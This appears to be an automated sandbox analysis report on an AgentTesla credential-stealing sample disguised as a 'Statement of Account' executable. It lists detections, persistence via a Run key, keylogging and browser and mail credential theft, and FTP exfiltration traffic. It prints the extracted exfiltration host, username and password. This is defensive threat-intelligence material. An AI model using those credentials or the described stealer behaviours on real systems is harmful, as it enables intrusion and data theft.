Windows Analysis Report
Statement of Account - USD 16,720.00.exe

Overview

General Information

Sample name: Statement of Account - USD 16,720.00.exe
Analysis ID: 1582790
MD5: cf173ca1db13dfc7237fd33630926b65
SHA1: 783e42e20da75ea1a2fd7a02e3824f251f26cf4f
SHA256: 1b9d152c5cd6e2904ada0ca707dbd2bb089ac59f8b07723490552a000848cc54
Tags: agenttesla, exe, user-juroots
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops executable to a common third party application directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • adobe.exe (PID: 1532 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
  • adobe.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
    • adobe.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: CF173CA1DB13DFC7237FD33630926B65)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(16 more entries not shown)

Source | Rule | Description | Author | Strings
0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x32156:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x321c8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x32252:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x322e4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3234e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x323c0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32456:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x324e6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2f439:$s2: GetPrivateProfileString
  • 0x2eb44:$s3: get_OSFullName
  • 0x3016e:$s5: remove_Key
  • 0x30313:$s5: remove_Key
  • 0x31272:$s6: FtpWebRequest
  • 0x32138:$s7: logins
  • 0x326aa:$s7: logins
  • 0x353bb:$s7: logins
  • 0x3546d:$s7: logins
  • 0x36dbe:$s7: logins
  • 0x36007:$s9: 1.85 (Hash, version 2, native byte-order)
6.2.adobe.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(15 more entries not shown)

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe, ProcessId: 1288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T14:01:58.492073+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 213.189.52.181 | 21 | TCP
2024-12-31T14:02:12.444136+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 213.189.52.181 | 21 | TCP
2024-12-31T14:02:20.618400+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 213.189.52.181 | 21 | TCP
2024-12-31T14:01:59.039543+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 213.189.52.181 | 63775 | TCP
2024-12-31T14:01:59.044751+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 213.189.52.181 | 63775 | TCP
2024-12-31T14:02:13.007555+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 213.189.52.181 | 63475 | TCP
2024-12-31T14:02:13.012652+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 213.189.52.181 | 63475 | TCP
2024-12-31T14:02:21.179731+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP
2024-12-31T14:02:21.188362+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP
2024-12-31T14:03:30.360786+0100 | 1800007 | 1 | A Network Trojan was detected | 192.168.2.5 | 49990 | 213.189.52.181 | 64485 | TCP
2024-12-31T14:02:21.188362+0100 | 1800009 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP

AV Detection

Source: Statement of Account - USD 16,720.00.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Avira: detection malicious, Label: HEUR/AGEN.1306767
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_evico", "Password": "Doll650#@"}
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | ReversingLabs: Detection: 50%
Source: Statement of Account - USD 16,720.00.exe | Virustotal: Detection: 33%
Source: Statement of Account - USD 16,720.00.exe | ReversingLabs: Detection: 50%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Joe Sandbox ML: detected
Source: Statement of Account - USD 16,720.00.exe | Joe Sandbox ML: detected
Source: Statement of Account - USD 16,720.00.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: Statement of Account - USD 16,720.00.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49718 -> 213.189.52.181:63475
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49709 -> 213.189.52.181:63775
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49713 -> 213.189.52.181:21
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49745 -> 213.189.52.181:21
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49707 -> 213.189.52.181:21
Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49756 -> 213.189.52.181:63292
Source: Network traffic | Suricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.5:49756 -> 213.189.52.181:63292
Source: Network traffic | Suricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.5:49990 -> 213.189.52.181:64485
Source: global traffic | TCP traffic: 213.189.52.181 ports 64485,63475,63775,1,2,63292,21
Source: global traffic | TCP traffic: 192.168.2.5:49709 -> 213.189.52.181:63775
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | IP Address: 213.189.52.181
Source: Joe Sandbox View | ASN Name: ECO-ATMAN-PLECO-ATMAN-PL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | FTP traffic detected: 213.189.52.181:21 -> 192.168.2.5:49707
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 4 of 150 allowed.
  220-Local time is now 14:01. Server port: 21.
  220-This is a private system - No anonymous login
  220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  Host: api.ipify.org
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: s4.serv00.com
Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s4.serv00.com
Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4486848273.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000006.00000002.2241640405.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000009.00000002.4487080897.000000000289C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, SKTzxzsJw.cs | .Net Code: yMwXHKL8p
Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\adobe\adobe.exe
Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018524292.0000000003321000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2017374336.000000000164E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000000.2012111808.0000000000FEA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFixo.exe* vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSoftwareGame.dll: vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe, 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed9e9e37e-59b8-4cab-97db-2b15f3b5cf75.exe4 vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe, 00000001.00000002.4484033977.0000000000B59000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe | Binary or memory string: OriginalFilenameFixo.exe* vs Statement of Account - USD 16,720.00.exe
Source: Statement of Account - USD 16,720.00.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.436b580.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Statement of Account - USD 16,720.00.exe, RandomClothingAttributesxc.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.5c50000.3.raw.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.43ad5b0.2.raw.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Statement of Account - USD 16,720.00.exe.44a1c80.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/2@2/2
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File created: C:\Users\user\AppData\Roaming\adobe\adobe.exe
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                    Source: Statement of Account - USD 16,720.00.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Statement of Account - USD 16,720.00.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: Statement of Account - USD 16,720.00.exeVirustotal: Detection: 33%
                    Source: Statement of Account - USD 16,720.00.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe File read: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeProcess created: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe "C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeSection loaded: wbemcomn.dllJump to behavior
